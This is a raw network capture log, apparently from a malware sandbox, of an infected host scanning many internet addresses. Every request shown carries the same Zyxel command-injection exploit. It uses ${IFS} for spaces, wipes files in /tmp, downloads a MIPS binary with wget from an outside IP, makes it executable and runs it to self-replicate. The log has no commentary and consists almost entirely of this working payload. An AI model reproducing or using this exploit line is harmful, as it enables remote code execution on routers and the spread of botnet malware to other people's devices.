                                            Jan 14, 2024 15:50:32.290456057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2253192.168.2.2352592204.69.46.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290482044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2254192.168.2.2345722174.155.235.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290509939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2255192.168.2.235225049.174.162.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290576935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2256192.168.2.236069884.117.154.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290611982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2257192.168.2.2355970142.235.254.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290611982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2258192.168.2.2353916174.102.125.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290641069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2259192.168.2.234548666.0.17.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290689945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2260192.168.2.2341136185.89.96.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290692091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2261192.168.2.2357796151.243.13.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290720940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2262192.168.2.233918492.113.248.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290750027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2263192.168.2.234961073.64.200.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290791035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2264192.168.2.2336710164.128.248.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290829897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2265192.168.2.235766218.162.55.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290854931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2266192.168.2.2341454137.28.152.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290877104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2267192.168.2.235290863.57.244.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290930033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2268192.168.2.235208092.79.133.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290950060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2269192.168.2.235702275.12.56.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.290985107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2270192.168.2.235765437.74.248.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291018009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2271192.168.2.235014659.158.118.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291038036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2272192.168.2.2347760216.219.49.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291058064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2273192.168.2.233695247.23.65.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291081905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2274192.168.2.2358200117.172.3.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291126966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2275192.168.2.2340552157.245.198.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291134119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2276192.168.2.2347882161.246.74.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291172981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2277192.168.2.234423693.113.248.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291196108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2278192.168.2.2349462166.32.47.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291213989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2279192.168.2.2358920196.51.142.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291250944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2280192.168.2.235809866.225.197.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291276932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2281192.168.2.234558640.100.189.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291296959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2282192.168.2.2342028187.222.123.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291328907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2283192.168.2.2344006143.136.168.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291357040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2284192.168.2.2359626218.118.121.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291418076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2285192.168.2.2337444129.41.127.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291419983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2286192.168.2.2336660137.235.116.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291490078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2287192.168.2.2337520194.2.252.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291490078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2288192.168.2.234781475.241.59.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291543007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2289192.168.2.23590822.177.204.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291562080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2290192.168.2.2350252179.156.172.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291574001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2291192.168.2.233897292.165.186.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291615963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2292192.168.2.235066286.166.11.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291647911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2293192.168.2.2355820112.80.253.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291676998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2294192.168.2.233779084.32.133.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291693926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2295192.168.2.233728871.141.94.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291738033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2296192.168.2.233815260.109.234.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291739941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2297192.168.2.234159663.129.30.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291798115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2298192.168.2.2359986149.237.120.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291810036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2299192.168.2.2348958192.75.120.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291855097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2300192.168.2.233600854.194.238.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291882992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2301192.168.2.2350212204.128.226.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291902065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2302192.168.2.235445044.169.236.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291943073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2303192.168.2.235247657.5.204.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.291980028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2304192.168.2.2360744192.108.219.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292009115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2305192.168.2.2352600174.54.137.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292043924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2306192.168.2.23584465.9.248.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292082071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2307192.168.2.2346580129.114.110.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292094946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2308192.168.2.2350912137.175.145.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292121887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2309192.168.2.2357158164.90.0.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292155027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2310192.168.2.233746873.242.140.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292197943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2311192.168.2.236075445.237.177.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292234898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2312192.168.2.235694244.218.1.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292280912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2313192.168.2.234763063.81.23.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292295933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2314192.168.2.2335662163.83.67.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292346954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2315192.168.2.235911672.48.104.176443
                                            TimestampBytes transferredDirectionData
